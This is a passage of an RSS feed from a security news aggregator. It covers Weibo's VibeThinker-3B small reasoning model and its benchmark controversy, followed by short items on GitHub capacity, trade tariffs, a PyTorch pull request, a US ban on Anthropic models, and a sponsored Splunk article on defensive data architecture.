href="https://huggingface.co/zai-org/GLM-5">GLM-5</a>, from Zhipu AI, has 744 billion parameters. <a href="https://huggingface.co/moonshotai/Kimi-K2.5">Kimi K2.5</a>, from Moonshot AI, exceeds 1 trillion. VibeThinker-3B's 3 billion parameters could run on a consumer laptop.</p><p>The researchers frame this result not as an anomaly but as evidence for a broader theoretical claim. They introduce what they call the "<a href="https://arxiv.org/pdf/2606.16140">Parametric Compression-Coverage Hypothesis</a>," which argues that different types of AI capability have fundamentally different relationships to model size. Verifiable reasoning — the kind tested by math competitions and coding challenges, where answers can be definitively checked — is what the paper calls a "parameter-dense" capability: one that can be compressed into a compact core. Open-domain knowledge, by contrast, is "parameter-expansive," requiring broad coverage across facts, concepts, and edge cases that inherently demands more parameters.</p><p>The paper acknowledges this distinction directly. On <a href="https://epoch.ai/benchmarks/gpqa-diamond">GPQA-Diamond</a>, a graduate-level science knowledge benchmark, VibeThinker-3B scored just 70.2 — well behind the 91.9 achieved by Gemini 3 Pro and the 87.0 scored by Claude Opus 4.5. The authors write that this gap "is consistent with our claim rather than a contradiction to it: the main finding is not that a 3B model has fully replaced leading general-purpose models, but that a small model can reach first-tier performance on many verifiable reasoning tasks."</p><div></div><h2><b>Inside the four-stage training pipeline that powers a tiny reasoning engine</b></h2><p><a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> is not built from scratch. It is post-trained on top of <a href="https://huggingface.co/Qwen/Qwen2.5-Coder-3B">Qwen2.5-Coder-3B</a>, a compact foundation model from Alibaba's Qwen team, through what the Weibo AI researchers call the "Spectrum-to-Signal Principle" — a multi-stage pipeline first introduced in the team's earlier VibeThinker-1.5B work in November 2025.</p><p>The training unfolds in four major phases. The first is a two-stage supervised fine-tuning process that uses curriculum learning: the model first trains on a broad mixture of math, code, STEM reasoning, general dialogue, and instruction-following data, then shifts to a curated subset of harder, longer-horizon reasoning problems. In the second stage, samples with reasoning traces shorter than 5,000 tokens are discarded, and problems that <a href="https://huggingface.co/WeiboAI/VibeThinker-1.5B">VibeThinker-1.5B</a> can solve more than 75 percent of the time are filtered out, forcing the model to focus on genuinely difficult challenges.</p><p>The second phase applies reinforcement learning across multiple domains — mathematics, code, and STEM — using the team's <a href="https://www.emergentmind.com/topics/maxent-guided-policy-optimization-mgpo">MaxEnt-Guided Policy Optimization</a> algorithm, or MGPO, which prioritizes training on problems at the model's current capability boundary rather than problems it already solves easily or finds impossible. Notably, the team found that a strategy that worked well at the 1.5B scale — progressively expanding the context window during RL training — actually hurt performance at 3B. They hypothesize that the stronger starting checkpoint meant that truncating reasoning traces during warm-up was no longer removing noise but disrupting valid reasoning patterns. The solution was to train with a single 64,000-token context window throughout.</p><p>Within the math RL phase, the team also introduces what it calls "<a href="https://arxiv.org/pdf/2606.16140">Long2Short Math RL</a>," a secondary optimization stage that redistributes rewards to favor shorter correct solutions over longer ones, reducing verbosity without sacrificing accuracy. The technique uses a zero-sum reward redistribution that avoids biasing the overall reward signal while nudging the model toward more efficient reasoning.</p><p>The third phase extracts high-quality reasoning trajectories from the RL-trained checkpoints and distills them back into a unified model through supervised fine-tuning. The team uses a "learning-potential score" — essentially the student model's perplexity on each teacher trajectory — to prioritize traces that are correct but that the student has not yet internalized. The final phase, called Instruct RL, applies reinforcement learning on instruction-following tasks using a combination of rule-based validators for format constraints and rubric-based reward models for open-ended quality assessment.</p><p><a href="https://x.com/f14bertolotti/status/2066752828505288902">Francesco Bertolotti</a>, an AI researcher who flagged the paper early on X, described the approach succinctly: "These results were achieved primarily through post-training refinements on Qwen2.5-Coder. The paper doesn't provide many details, but it appears they distill from RL ckpts and then do a final RL-based instruct RL." His post drew over 161,000 views.</p><div></div><h2><b>Real-world testing reveals the gap between benchmark scores and practical AI performance</b></h2><p>For every enthusiastic reaction, the paper drew an equally forceful objection. The AI research community in mid-2026 has grown deeply wary of benchmark-driven claims, and <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> arrived in an environment primed for suspicion.</p><p>"The benchmarks are literal pattern matching single file coding," wrote <a href="https://x.com/BigMoonKR/status/2066950583941214698">@BigMoonKR</a> on X. "It has no relation to actual coding work. I don't know how people still don't get this."</p><p>"Benchmaxxing," declared @<a href="https://x.com/oflu_bedirhan/status/2066883558388404717">oflu_bedirhan</a>, using a term that has become shorthand in the AI community for models that appear optimized specifically for benchmark performance at the expense of real-world utility.</p><p>The most pointed criticism came from users who actually downloaded and tested the model. "Just tried the full precision," wrote <a href="https://x.com/politilols/status/2066901234091438132">@politilols</a>. "It doesn't even know what a uv script (so the most popular Python dev tool) is. Haven't seen that in a single LLM in at least a year now. Benchmaxxed." When Bertolotti responded that the model seemed more focused on mathematical reasoning than practical coding, the user countered: "They include a livecodebench score. Zero chance that is reflective of the model."</p><p><a href="https://x.com/Itsdotdev/status/2066961630521385166">@Itsdotdev</a> raised a structural criticism: "Look into the benchmarks themselves and it probably won't be so shocking. Why no DeepSWE? Why none of the standard benchmarks SOTA providers use?" The user @AvenirReym posed a more diagnostic question: "If it holds on a benchmark made after the model's training cutoff, it's real. If it only wins on AIME-style sets that have been circulating for years, it's leakage."</p><p>The paper's authors appear to have anticipated these objections. The technical report states that training sets "have undergone strict benchmark decontamination," including n-gram-based filtering to remove "n-gram overlaps with evaluation sets."</p><p>The LeetCode contest evaluation — which covers contests from April 25 to May 31, 2026, dates that postdate any plausible training data cutoff — represents the most robust guard against data contamination concerns. On those contests, VibeThinker-3B passed 123 out of 128 first-attempt submissions, a 96.1 percent rate that exceeded GPT-5.2, Doubao Seed 2.0 Pro, Kimi K2.5, and Claude Opus 4.6 under identical evaluation conditions.</p><p>Still, real-world user reports suggest a significant gap between benchmark performance and practical utility — a phenomenon that has become familiar across the industry. "In LM Studio it only responds well to first question, next questions reply to the first question," reported <a href="https://x.com/luismolinaab/status/2066980744220528940">@luismolinaab</a>.</p><div></div><h2><b>Why a social media company may have found a crack in the scaling hypothesis</b></h2><p>Even the sharpest critics acknowledged that achieving these benchmark numbers at 3 billion parameters — regardless of how transferable they are to production use cases — is a meaningful engineering achievement. "Even if it's benchmaxxing doing so with 3B parameters is fascinating, goes to show how fast this field is progressing," wrote <a href="https://x.com/rohityin/status/2066913806287327302">@rohityin.</a></p><p>The observation cuts to a question that has consumed the AI industry since the advent of the scaling hypothesis: Is bigger always better? The conventional wisdom, articulated most famously in the Chinchilla scaling laws and reinforced by the commercial dominance of ever-larger foundation models, holds that more parameters and more training data reliably yield better performance. The economic corollary is stark: training and deploying frontier models costs tens or hundreds of millions of dollars, creating enormous barriers to entry.</p><p><a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> challenges that consensus — but only partially. The paper is careful to draw a boundary around its claims, distinguishing between tasks with "clear verification signals" and those that require broad factual knowledge. The Parametric Compression-Coverage Hypothesis explicitly argues that small models cannot replace large ones across the board.</p><p>"The true significance of VibeThinker-3B does not lie in proving that a 3B model can replace large-scale generalists," the paper states, "but rather in providing a concrete empirical signal: the development of compact models is no longer merely a passive compromise for deployment efficiency or cost control; it emerges as a promising research trajectory that is fundamentally complementary to the traditional parameter scaling paradigm."</p><p>Perhaps the most surprising element of the work is its provenance. Sina Weibo — publicly traded on Nasdaq and Hong Kong, with a market capitalization that fluctuates in the single-digit billions — is not a company typically associated with frontier AI research. Yet the VibeThinker series is Weibo's second major open-source AI contribution in seven months. </p><p><a href="https://huggingface.co/WeiboAI/VibeThinker-1.5B">VibeThinker-1.5B</a>, released in November 2025, demonstrated that a model with just 1.5 billion parameters could outperform the original DeepSeek R1 on several math benchmarks — a result the team achieved for what it claimed was a post-training cost of just $7,800, compared to the $294,000 estimated for DeepSeek R1.</p><p>The research team is compact — nine authors, all listed as Sina Weibo Inc. employees. The model is released under the <a href="https://opensource.org/license/mit">MIT License</a>, one of the most permissive open-source licenses available, and the weights are freely downloadable from both <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">Hugging Face</a> and <a href="https://modelscope.cn/models/WeiboAI/VibeThinker-3B">ModelScope</a>. Within the first day of release, community members had already created GGUF quantizations and derivative models.</p><h2><b>Small models, big implications, and the question the AI industry can no longer avoid</b></h2><p>The most honest assessment of <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> may be that it is simultaneously less and more than what the benchmarks suggest. Less, because a model that struggles with basic knowledge of popular developer tools is unlikely to replace any production-grade coding assistant anytime soon. More, because the underlying insight — that reasoning ability and factual knowledge are partially decoupled, and that the former can be compressed far more aggressively than previously assumed — has profound implications for how the industry thinks about model design, deployment economics, and the accessibility of advanced AI capabilities.</p><div></div><p>If the <a href="https://arxiv.org/pdf/2606.16140">Parametric Compression-Coverage Hypothesis</a> holds, it suggests a future in which small, specialized reasoning engines operate alongside large knowledge-rich models in hybrid architectures — a vision where a 3-billion-parameter model handles the logical heavy lifting while a larger system supplies the factual grounding. Such an architecture could dramatically reduce the cost of deploying AI reasoning capabilities, potentially bringing competition-level mathematical and coding performance to devices with modest hardware.</p><p>"The interesting part is that we're starting to separate knowledge from reasoning," wrote <a href="https://x.com/RealLambdaFlux/status/2066924260724265463">@RealLambdaFlux</a> on X. "A small model with strong post-training can punch way above its size on tasks with clear feedback."</p><p><a href="https://x.com/cmitsakis/status/2066850007693578352">@cmitsakis</a> suggested the practical endgame: "I think small models are the future for agents because they can use tools to get the knowledge and they can run fast and cheap."</p><p>Whether that future arrives through <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> specifically, or through the dozens of teams now racing to reproduce and extend these results, the paper has already accomplished something that no benchmark score can fully capture.</p><p>It has forced the AI community to confront an uncomfortable possibility: that for years, the industry may have been spending billions of dollars scaling up parameters to improve a kind of intelligence that could have fit, all along, on a laptop. The weights are public. The code is open. And the most important test isn't on any leaderboard — it's whether anyone can make a model this small actually useful in the real world.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft forced to turn to AWS to boost GitHub cloud capacity following AI demand surge]]></title>
<description><![CDATA[GitHub's migration to Azure under strain as demand causes Microsoft to reach out to AWS for extra capacity.]]></description>
<link>https://tsecurity.de/de/3602183/it-nachrichten/microsoft-forced-to-turn-to-aws-to-boost-github-cloud-capacity-following-ai-demand-surge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602183/it-nachrichten/microsoft-forced-to-turn-to-aws-to-boost-github-cloud-capacity-following-ai-demand-surge/</guid>
<pubDate>Tue, 16 Jun 2026 16:34:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GitHub's migration to Azure under strain as demand causes Microsoft to reach out to AWS for extra capacity.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cynicism Behind the Administration’s Proposed Forced Labor Tariffs]]></title>
<description><![CDATA[The labor issues the U.S. Trade Representative claims to investigate are real problems. They should not become pretexts for tariffs the administration already wants.
The post The Cynicism Behind the Administration’s Proposed Forced Labor Tariffs appeared first on Just Security.]]></description>
<link>https://tsecurity.de/de/3601917/it-security-nachrichten/the-cynicism-behind-the-administrations-proposed-forced-labor-tariffs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601917/it-security-nachrichten/the-cynicism-behind-the-administrations-proposed-forced-labor-tariffs/</guid>
<pubDate>Tue, 16 Jun 2026 15:09:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The labor issues the U.S. Trade Representative claims to investigate are real problems. They should not become pretexts for tariffs the administration already wants.</p>
<p>The post <a href="https://www.justsecurity.org/142153/cynicism-proposed-forced-labor-tariffs/">The Cynicism Behind the Administration’s Proposed Forced Labor Tariffs</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HR must manage AI bots as well as humans, says Accenture executive]]></title>
<description><![CDATA[Matt Prebble says businesses will be forced to rethink leadership models]]></description>
<link>https://tsecurity.de/de/3600683/ai-nachrichten/hr-must-manage-ai-bots-as-well-as-humans-says-accenture-executive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600683/ai-nachrichten/hr-must-manage-ai-bots-as-well-as-humans-says-accenture-executive/</guid>
<pubDate>Tue, 16 Jun 2026 07:08:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Matt Prebble says businesses will be forced to rethink leadership models]]></content:encoded>
</item>
<item>
<title><![CDATA[ciflow/rocm-mi300/183838: [Inductor][HOP] Handle unbacked FlexAttention predicates]]></title>
<description><![CDATA[EP-overlap graph chunking traces FlexAttention with unbacked symbolic batch and sequence dimensions. These are valid runtime sizes, but FlexAttention predicate sites forced trace-time decisions that should either fall back to the general kernel or remain represented as deferred symbolic assertion...]]></description>
<link>https://tsecurity.de/de/3600430/downloads/ciflowrocm-mi300183838-inductorhop-handle-unbacked-flexattention-predicates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600430/downloads/ciflowrocm-mi300183838-inductorhop-handle-unbacked-flexattention-predicates/</guid>
<pubDate>Tue, 16 Jun 2026 02:22:26 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>EP-overlap graph chunking traces FlexAttention with unbacked symbolic batch and sequence dimensions. These are valid runtime sizes, but FlexAttention predicate sites forced trace-time decisions that should either fall back to the general kernel or remain represented as deferred symbolic assertions.</p>
<p>Flex decoding remains an optional optimized implementation. Its predicates use guard_or_false because they are kernel eligibility checks, not user-visible invariants: when ShapeEnv can prove eligibility, decode can be selected; when an unbacked predicate is not provable, the general FlexAttention kernel is used. Failing to prove an optimization must not impose a runtime shape contract on user inputs.</p>
<p>Backward fake propagation preserves the accepted KV-batch-broadcast metadata contract. It reduces grad_key and grad_value back to key/value batch when key/value is provably batch-broadcasted; otherwise it records the non-broadcast invariant with torch._check(Bq == Bkv) and returns unreduced metadata.</p>
<p>Public BlockMask length validation is expressed as two symbolic torch._check predicates: the mask must not be smaller than the query/key lengths, and it must not be larger than those lengths. Concrete mismatches still fail with the existing guidance, while unbacked symbolic lengths become deferred runtime assertions instead of forcing Python to branch on an unbacked expression.</p>
<p>This PR was authored with assistance from an AI assistant.</p>
<p>Test Plan:</p>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='python -m pytest test/inductor/test_flex_attention.py -q -s -k "unbacked_flex_decoding_eligibility_falls_back or backward_fake_symbolic_query_key_batch_non_broadcast or block_mask_vs_sequence_lengths"'><pre>python -m pytest test/inductor/test_flex_attention.py -q -s -k <span class="pl-s"><span class="pl-pds">"</span>unbacked_flex_decoding_eligibility_falls_back or backward_fake_symbolic_query_key_batch_non_broadcast or block_mask_vs_sequence_lengths<span class="pl-pds">"</span></span></pre></div>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='python -m pytest test/inductor/test_flex_attention.py -q -s -k "mask_mod_handles_symint_addition or mask_mod_handles_derived_symint_closure or symbol_closure_in_score_mod"'><pre>python -m pytest test/inductor/test_flex_attention.py -q -s -k <span class="pl-s"><span class="pl-pds">"</span>mask_mod_handles_symint_addition or mask_mod_handles_derived_symint_closure or symbol_closure_in_score_mod<span class="pl-pds">"</span></span></pre></div>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="lintrunner -a"><pre>lintrunner -a</pre></div>
<p>stack-info: PR: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4450851844" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/183838" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/183838/hovercard" href="https://github.com/pytorch/pytorch/pull/183838">#183838</a>, branch: sanketpurandare/stack/12</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ciflow/torchtitan/183838: [Inductor][HOP] Handle unbacked FlexAttention predicates]]></title>
<description><![CDATA[EP-overlap graph chunking traces FlexAttention with unbacked symbolic batch and sequence dimensions. These are valid runtime sizes, but FlexAttention predicate sites forced trace-time decisions that should either fall back to the general kernel or remain represented as deferred symbolic assertion...]]></description>
<link>https://tsecurity.de/de/3600429/downloads/ciflowtorchtitan183838-inductorhop-handle-unbacked-flexattention-predicates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600429/downloads/ciflowtorchtitan183838-inductorhop-handle-unbacked-flexattention-predicates/</guid>
<pubDate>Tue, 16 Jun 2026 02:22:18 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>EP-overlap graph chunking traces FlexAttention with unbacked symbolic batch and sequence dimensions. These are valid runtime sizes, but FlexAttention predicate sites forced trace-time decisions that should either fall back to the general kernel or remain represented as deferred symbolic assertions.</p>
<p>Flex decoding remains an optional optimized implementation. Its predicates use guard_or_false because they are kernel eligibility checks, not user-visible invariants: when ShapeEnv can prove eligibility, decode can be selected; when an unbacked predicate is not provable, the general FlexAttention kernel is used. Failing to prove an optimization must not impose a runtime shape contract on user inputs.</p>
<p>Backward fake propagation preserves the accepted KV-batch-broadcast metadata contract. It reduces grad_key and grad_value back to key/value batch when key/value is provably batch-broadcasted; otherwise it records the non-broadcast invariant with torch._check(Bq == Bkv) and returns unreduced metadata.</p>
<p>Public BlockMask length validation is expressed as two symbolic torch._check predicates: the mask must not be smaller than the query/key lengths, and it must not be larger than those lengths. Concrete mismatches still fail with the existing guidance, while unbacked symbolic lengths become deferred runtime assertions instead of forcing Python to branch on an unbacked expression.</p>
<p>This PR was authored with assistance from an AI assistant.</p>
<p>Test Plan:</p>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='python -m pytest test/inductor/test_flex_attention.py -q -s -k "unbacked_flex_decoding_eligibility_falls_back or backward_fake_symbolic_query_key_batch_non_broadcast or block_mask_vs_sequence_lengths"'><pre>python -m pytest test/inductor/test_flex_attention.py -q -s -k <span class="pl-s"><span class="pl-pds">"</span>unbacked_flex_decoding_eligibility_falls_back or backward_fake_symbolic_query_key_batch_non_broadcast or block_mask_vs_sequence_lengths<span class="pl-pds">"</span></span></pre></div>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='python -m pytest test/inductor/test_flex_attention.py -q -s -k "mask_mod_handles_symint_addition or mask_mod_handles_derived_symint_closure or symbol_closure_in_score_mod"'><pre>python -m pytest test/inductor/test_flex_attention.py -q -s -k <span class="pl-s"><span class="pl-pds">"</span>mask_mod_handles_symint_addition or mask_mod_handles_derived_symint_closure or symbol_closure_in_score_mod<span class="pl-pds">"</span></span></pre></div>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="lintrunner -a"><pre>lintrunner -a</pre></div>
<p>stack-info: PR: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4450851844" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/183838" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/183838/hovercard" href="https://github.com/pytorch/pytorch/pull/183838">#183838</a>, branch: sanketpurandare/stack/12</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The US government’s Anthropic models ban was never about an AI jailbreak]]></title>
<description><![CDATA[The Trump administration’s decision that forced Anthropic to pull its latest cybersecurity models could be reactionary, retaliatory, or both, but the message is clear: The AI industry isn’t immune from U.S. government interference. This article has been indexed from Security…
Read more →
The post...]]></description>
<link>https://tsecurity.de/de/3600318/it-security-nachrichten/the-us-governments-anthropic-models-ban-was-never-about-an-ai-jailbreak/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600318/it-security-nachrichten/the-us-governments-anthropic-models-ban-was-never-about-an-ai-jailbreak/</guid>
<pubDate>Tue, 16 Jun 2026 00:25:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Trump administration’s decision that forced Anthropic to pull its latest cybersecurity models could be reactionary, retaliatory, or both, but the message is clear: The AI industry isn’t immune from U.S. government interference. This article has been indexed from Security…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-us-governments-anthropic-models-ban-was-never-about-an-ai-jailbreak/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-us-governments-anthropic-models-ban-was-never-about-an-ai-jailbreak/">The US government’s Anthropic models ban was never about an AI jailbreak</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The US government’s Anthropic models ban was never about an AI jailbreak]]></title>
<description><![CDATA[The Trump administration's decision that forced Anthropic to pull its latest cybersecurity models could be reactionary, retaliatory, or both, but the message is clear: The AI industry isn't immune from U.S. government interference.]]></description>
<link>https://tsecurity.de/de/3600289/it-nachrichten/the-us-governments-anthropic-models-ban-was-never-about-an-ai-jailbreak/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600289/it-nachrichten/the-us-governments-anthropic-models-ban-was-never-about-an-ai-jailbreak/</guid>
<pubDate>Tue, 16 Jun 2026 00:06:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Trump administration's decision that forced Anthropic to pull its latest cybersecurity models could be reactionary, retaliatory, or both, but the message is clear: The AI industry isn't immune from U.S. government interference.]]></content:encoded>
</item>
<item>
<title><![CDATA[Attackers scale deception with AI. Defenders need truth at machine speed.]]></title>
<description><![CDATA[Presented by SplunkAI has changed the economics of cyber deception.An attacker can now generate thousands of convincing phishing lures, fake identities, and tailored pretexts before a defender finishes a single change-control cycle. That is the new security challenge: deception got faster and che...]]></description>
<link>https://tsecurity.de/de/3599462/it-nachrichten/attackers-scale-deception-with-ai-defenders-need-truth-at-machine-speed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599462/it-nachrichten/attackers-scale-deception-with-ai-defenders-need-truth-at-machine-speed/</guid>
<pubDate>Mon, 15 Jun 2026 16:35:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Splunk</i></p><hr><p>AI has changed the economics of cyber deception.</p><p>An attacker can now generate thousands of convincing phishing lures, fake identities, and tailored pretexts before a defender finishes a single change-control cycle. That is the new security challenge: deception got faster and cheaper, while verification did not.</p><p>Much of the discussion around AI for defense centers on detection models. Detection matters, but it is not the only bottleneck. The deeper constraint is evidence: where data lives, whether it is available when needed, how quickly it can be correlated, how long it is retained, and whether analysts or agents can trust what they retrieve.</p><p>Defense in the AI era is a data problem before it is a detection problem.</p><h2>The defender’s advantage is truth</h2><p>Attackers can afford to lie at enterprise scale. They can test endless combinations of messages, identities, domains, and attack paths, and most can fail at almost no cost.</p><p>Defenders do not have that luxury. Their advantage is truth: quickly knowing what happened, where, when, which identity was involved, which assets were affected, what changed, and what business process may be at risk.</p><p>That truth must be documented, governed, auditable, and defensible. Attackers are using AI to scale deception, impersonation, social engineering, and speed. Defenders need AI to scale verification.</p><p>The goal is not just to act faster than the attacker. It is to take action that people and machines can trust.</p><h2>Fragmented data breaks modern defense</h2><p>Consider a suspicious login from a contractor account. On its own, it is just another authentication anomaly. To know whether it matters, a security team may need identity history, endpoint activity, cloud access logs, ticketing records, asset ownership, configuration changes, network telemetry, and business context.</p><p>If those records sit in different tools, expire at different times, or require multiple teams to retrieve, defenders are not investigating the incident. They are negotiating with their own data estate.</p><p>When signals can be reached in place and correlated quickly, the issue is no longer just whether the login looks unusual. It becomes whether the enterprise has enough evidence, in enough context, to take action it can defend.</p><p>That challenge grows more urgent with AI assistants and agents. AI can only reason over what it can retrieve in time to matter. If the data is partial, stale, fragmented, unavailable, or stripped of context, AI does not create truth. It accelerates uncertainty.</p><h2>The system of record must become a defensive control plane</h2><p>For years, enterprises treated security platforms, SIEMs, and data lakes as passive repositories: places to store data for later search and analysis. That model is no longer enough.</p><p>What organizations now need is a defensive control plane: a layer that connects what happened, what it means, and what the enterprise is allowed to do about it. In architectural terms, it ties together raw machine data, business context, and policy. It does not just store evidence. It makes evidence usable for decisions and actions that must be explainable and trusted.</p><p>In practice, that means doing four things well: preserving evidence, reaching data wherever it lives, adding business context, and governing action. More on each below.</p><p>The old system of record answered one question: What is the official record?</p><p>A defensive control plane answers the questions that matter operationally: What happened? What does it mean? What evidence supports that conclusion? And what action can we trust?</p><p>AI does not reduce the need for authoritative records. It raises the standard for what those records must do.</p><h2>A defensive control plane must do four things</h2><ol><li><p><b>Preserve evidence. </b>Logs, metrics, traces, events, identity records, configuration changes, tickets, and asset state all help establish what happened. Their value often becomes clear only after an incident begins.</p></li><li><p><b>Make data accessible wherever it lives</b>. Security-relevant data is already spread across object stores, cloud platforms, operational tools, and business systems. Moving every byte into one place is often too slow, too expensive, and too difficult to govern. The better model is to bring analytics to the data.</p></li><li><p><b>Add business context. </b>Correlating machine data with business information turns “anomaly on host X” into “the system supporting payment services for top accounts is being probed.” That is what allows organizations to prioritize correctly.</p></li><li><p><b>Govern action</b>. In the agentic era, systems will do more than summarize incidents. They will enrich alerts, open cases, trigger workflows, isolate assets, update policies, and escalate decisions. Enterprises need to know what evidence an agent used, what policy governed the action, whether it stayed within scope, and how the decision can be reviewed afterward.</p></li></ol><h2>The real SOC problem is not too little data</h2><p>Modern SOCs are not suffering from a lack of data. They are suffering from a lack of usable context.</p><p>According to the Splunk State of Security 2025 report, SOC analysts continue to struggle with too many alerts (59%), too many false positives (55%), and alerts that lack context (46%). The issue is not data volume. It is the difficulty of turning fragmented signals into trusted decisions.</p><p>Today, analysts are left stitching together context manually, pivoting across disconnected tools, and making high-stakes decisions without the full picture in time. Even as AI improves, outcomes still depend on whether humans are willing to approve changes across fragmented environments.</p><p>This creates a daily crisis of context. Teams are forced to make consequential decisions based on data they cannot easily see, correlate, or trust. The result is latency, inconsistency, missed opportunities, and unnecessary risk.</p><h2>Trusted action is the durable advantage</h2><p>A data fabric architecture offers a way forward by creating a unified, intelligent layer across data sources spanning SecOps, ITOps, and NetOps. The goal is not centralization for its own sake. It is to break down silos and deliver context-rich insight at the speed AI-driven operations require.</p><p>This is an operating model before it is a product. AI-driven defense depends on a foundation that can preserve evidence, reach data where it lives, add context, and maintain a reviewable link between data, decision, and action. That is the architectural shift behind Cisco Data Fabric powered by the Splunk Platform, which brings together machine data, federation, business context, governance, and provenance to help teams move from signal to trusted action.</p><p>Attackers will keep making deception cheaper, faster, and more personalized. Defenders do not win that race by generating more noise. They win by making truth faster, and by grounding every action in evidence that people and machines can trust.</p><p><i>Learn more about the </i><a href="https://www.splunk.com/ciscodatafabric"><i>Cisco Data Fabric powered by the Splunk Platform</i></a>.</p><p><i>Seth Brickman is VP, Global Product - Splunk Platform, Cisco.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Agents Break Data Perimeters]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:8 The discussion highlights a shift in security architecture driven by agentic AI systems. Instead of traditional network perimeters, the focus is moving toward data-centric security, including lineage, contextualization, and data s...]]></description>
<link>https://tsecurity.de/de/3599410/it-security-video/ai-agents-break-data-perimeters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599410/it-security-video/ai-agents-break-data-perimeters/</guid>
<pubDate>Mon, 15 Jun 2026 16:18:45 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:8 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Lp7G_W1xA1I?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The discussion highlights a shift in security architecture driven by agentic AI systems. Instead of traditional network perimeters, the focus is moving toward data-centric security, including lineage, contextualization, and data security posture management (DSPM).<br />
<br />
As AI agents interact with data at machine speed, traditional human-driven governance and security processes may no longer be sufficient. Organizations are being forced to rethink resilience and recovery models to match the speed and scale of AI-driven systems. This creates a gap between technological capability and operational oversight.<br />
<br />
The result is a structural shift in how trust and control are established in modern systems.<br />
<br />
How do organizations maintain control when AI systems operate faster than human governance can respond?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#DataSecurity #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Maine forced to take down data breach portal after fake notices filed with authorities]]></title>
<description><![CDATA[The US state of Maine has taken its public data breach notification portal offline after someone submitted fraudulent breach disclosures impersonating two well-known technology companies.

Read more in my article on the Hot for Security blog.]]></description>
<link>https://tsecurity.de/de/3599299/it-security-nachrichten/maine-forced-to-take-down-data-breach-portal-after-fake-notices-filed-with-authorities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599299/it-security-nachrichten/maine-forced-to-take-down-data-breach-portal-after-fake-notices-filed-with-authorities/</guid>
<pubDate>Mon, 15 Jun 2026 15:39:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The US state of Maine has taken its public data breach notification portal offline after someone submitted fraudulent breach disclosures impersonating two well-known technology companies.

Read more in my article on the Hot for Security blog.]]></content:encoded>
</item>
<item>
